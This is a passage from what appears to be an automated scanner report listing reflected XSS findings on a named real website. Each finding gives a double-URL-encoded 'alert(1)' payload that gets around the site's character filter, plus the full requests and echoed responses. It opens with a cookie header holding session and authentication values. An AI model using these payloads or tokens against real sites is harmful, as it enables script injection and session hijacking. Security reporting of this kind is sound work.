Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:34 GMT
Content-Length: 28941
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/splash-hexc7c46";alert(1)//c83f6df0c1c","E404") ;
   </script>
...[SNIP]...

1.497. http://www.sigmaaldrich.com/foresee/foresee-trigger.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /foresee/foresee-trigger.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf8a0%2522%253balert%25281%2529%252f%252f19e528ea9f0 was submitted in the REST URL parameter 1. This input was echoed as cf8a0";alert(1)//19e528ea9f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /foreseecf8a0%2522%253balert%25281%2529%252f%252f19e528ea9f0/foresee-trigger.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:07 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28930


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/foreseecf8a0";alert(1)//19e528ea9f0/foresee-trigger.js","E404") ;
   </script>
...[SNIP]...

1.498. http://www.sigmaaldrich.com/js/SAcommon.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/SAcommon.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abc18%2522%253balert%25281%2529%252f%252fbc02b169d87 was submitted in the REST URL parameter 1. This input was echoed as abc18";alert(1)//bc02b169d87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsabc18%2522%253balert%25281%2529%252f%252fbc02b169d87/SAcommon.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28918


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/jsabc18";alert(1)//bc02b169d87/SAcommon.js","E404") ;
   </script>
...[SNIP]...

1.499. http://www.sigmaaldrich.com/js/SAcommon.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/SAcommon.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1256%2522%253balert%25281%2529%252f%252fa5b61cfabf7 was submitted in the REST URL parameter 2. This input was echoed as f1256";alert(1)//a5b61cfabf7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/SAcommon.jsf1256%2522%253balert%25281%2529%252f%252fa5b61cfabf7 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:01 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28918


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/SAcommon.jsf1256";alert(1)//a5b61cfabf7","E404") ;
   </script>
...[SNIP]...

1.500. http://www.sigmaaldrich.com/js/cartlinks.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/cartlinks.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 590cf%2522%253balert%25281%2529%252f%252f4bb73ab02d2 was submitted in the REST URL parameter 1. This input was echoed as 590cf";alert(1)//4bb73ab02d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js590cf%2522%253balert%25281%2529%252f%252f4bb73ab02d2/cartlinks.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28919


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js590cf";alert(1)//4bb73ab02d2/cartlinks.js","E404") ;
   </script>
...[SNIP]...

1.501. http://www.sigmaaldrich.com/js/cartlinks.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/cartlinks.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8dd0%2522%253balert%25281%2529%252f%252f3856b28f0c4 was submitted in the REST URL parameter 2. This input was echoed as a8dd0";alert(1)//3856b28f0c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/cartlinks.jsa8dd0%2522%253balert%25281%2529%252f%252f3856b28f0c4 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:01 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28919


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/cartlinks.jsa8dd0";alert(1)//3856b28f0c4","E404") ;
   </script>
...[SNIP]...

1.502. http://www.sigmaaldrich.com/js/cmdatatagutils.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/cmdatatagutils.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e152%2522%253balert%25281%2529%252f%252f1b874369945 was submitted in the REST URL parameter 1. This input was echoed as 4e152";alert(1)//1b874369945 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js4e152%2522%253balert%25281%2529%252f%252f1b874369945/cmdatatagutils.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=af411ba5-497d-994f-8fee-76093b9e4ac6;Path=/
Content-Length: 28924


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js4e152";alert(1)//1b874369945/cmdatatagutils.js","E404") ;
   </script>
...[SNIP]...

1.503. http://www.sigmaaldrich.com/js/cmdatatagutils.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/cmdatatagutils.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2a29%2522%253balert%25281%2529%252f%252f6e9bf014190 was submitted in the REST URL parameter 2. This input was echoed as d2a29";alert(1)//6e9bf014190 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/cmdatatagutils.jsd2a29%2522%253balert%25281%2529%252f%252f6e9bf014190 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:00 GMT
Connection: close
Set-Cookie: JSESSIONID=979fe58a-1fe9-6241-8157-6aa5b4ffb473;Path=/
Content-Length: 28924


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/cmdatatagutils.jsd2a29";alert(1)//6e9bf014190","E404") ;
   </script>
...[SNIP]...

1.504. http://www.sigmaaldrich.com/js/controls.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/controls.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d427d%2522%253balert%25281%2529%252f%252fafb0e2c2678 was submitted in the REST URL parameter 1. This input was echoed as d427d";alert(1)//afb0e2c2678 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsd427d%2522%253balert%25281%2529%252f%252fafb0e2c2678/controls.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=t3=1289930583180&pi=/content/sigma-aldrich/the-americas/united-states; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1289930583180}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28918


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/jsd427d";alert(1)//afb0e2c2678/controls.js","E404") ;
   </script>
...[SNIP]...

1.505. http://www.sigmaaldrich.com/js/controls.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/controls.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2104b%2522%253balert%25281%2529%252f%252fc1d92a36425 was submitted in the REST URL parameter 2. This input was echoed as 2104b";alert(1)//c1d92a36425 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/controls.js2104b%2522%253balert%25281%2529%252f%252fc1d92a36425 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=t3=1289930583180&pi=/content/sigma-aldrich/the-americas/united-states; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1289930583180}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:01 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28918


